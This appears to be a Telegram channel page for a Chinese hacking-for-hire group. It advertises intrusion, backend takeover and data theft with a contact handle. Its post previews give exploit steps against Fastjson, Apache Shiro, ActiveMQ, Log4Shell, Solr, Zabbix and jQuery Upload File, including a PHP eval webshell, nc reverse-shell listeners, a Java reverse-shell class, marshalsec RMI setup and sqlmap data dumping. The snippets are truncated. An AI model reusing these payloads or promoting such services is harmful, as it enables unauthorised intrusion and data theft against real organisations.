爬虫 拿站 权限提取 数据
@rdsjgpr渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等 技术辅助 联系:@duyuanejse
Посты канала (20)
- 3. 使用python在Exploit.class目录开启http服务 python3 -m http.server 8888 4. 使用marshalsec开启一个rmi服务为9999端口,去访问并执行python开启的http服务中E… 11.06.2026
- — 让搜索更高效 · 让信息更有价值 — 🔍帮你找到有趣的群组、频道、视频、音乐、电影、新闻 📢: @CJYQNEWS | 🤖: @CJYQ 👇点击下方按钮,进行搜索👇 10.06.2026
- 2. 那么可以尝试反弹shell,首先编译exp文件为class文件(根据自己NC监听的VPS和端口设置ip/port) exp文件: import java.io.BufferedReader; import java.io.Input… 10.06.2026
- 0x03 漏洞复现 漏洞版本: Fastjson<1.2.24远程代码执行(CNVD-2017-02833) 1.执行poc访问Dnslog服务,发现可出网 POST / HTTP/1.1 Host: x.x.x.x:8090 User-… 09.06.2026
- 0x02 漏洞描述 Fastjson是一个Java库,可以将Java对象转换为JSON格式,当然它也可以将JSON字符串转换为Java对象。 在1.2.24中,fastjson在解析json的过程中,支持使用@type字段来指定反序列化的… 08.06.2026
- 通过admin:admin弱口令进入管理端 Queues → eventjia → 点击Message ID下的队列消息即可 nc监听得到一个shell nc.exe -lvvp 7777 渗透技术团队,可渗透,可拿后台,权限提取数据,可… 07.06.2026
- Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。… 06.06.2026
- 漏洞复现 漏洞版本: Apache Shiro <= 1.2.4 1.执行ShiroKeyCheck_windows-amd64.exe发现存在漏洞并爆出密钥 ShiroKeyCheck_windows-amd64.exe -u http… 05.06.2026
- ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 ApacheShiro1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的C… 04.06.2026
- 0x02 Log4Shell 漏洞原理 日志方法:logger.error(str) 2a Lookup 机制 将 ${...} 中的特定字符串映射到相应的值,举例如图所示。 通过 lookup 机制,让 log4j 的记录功能更加强大,… 02.06.2026
- 0x01 Tai-e 的污点分析方案 Java 污点分析(追踪污点数据流)最令人头疼的两个难点:别名关系和动态反射。 Tai-e 污点分析提出一个基于指针分析的架构,来解决别名分析和反射分析两个问题。 解决方案思路: 将污点转换成对象,然… 02.06.2026
- ApacheSolr是一个功能强大的开源搜索服务器,它支持REST风格API。在ApacheSolr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成任意文件读取。 漏洞影响: Apache Solr <= 8.8.1 … 01.06.2026
- 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案,骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强… 30.05.2026
- 使用账户名密码登录admin:zabbix http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&re nc监听77… 30.05.2026
- 使用sqlmap查库、查表、查列、查数据 查所有库: python3 sqlmap.py -u "http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileI… 29.05.2026
- 漏洞复现 漏洞影响:zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3 FOFA:app=”ZABBIX-监控系统” 1.输入payload爆出数据库用户名 http://x.x.x.x:8080/jsrpc.… 28.05.2026
- zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。Zabbix的lates… 27.05.2026
- 连接webshell,得到一个shell,密码为ry http://x.x.x.x:31430/jquery-upload-file/php/uploads/shell.php 渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等 技… 26.05.2026
- 漏洞复现 漏洞影响: jQuery Upload File <= 4.0.2 FOFA:title=”jquery-upload-file”(暂时没搜到) 1.准备一个一句话木马,取名为shell.php <?php @eval($_PO… 25.05.2026
- jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery Upload File <= 4.0.2 中的任意文… 24.05.2026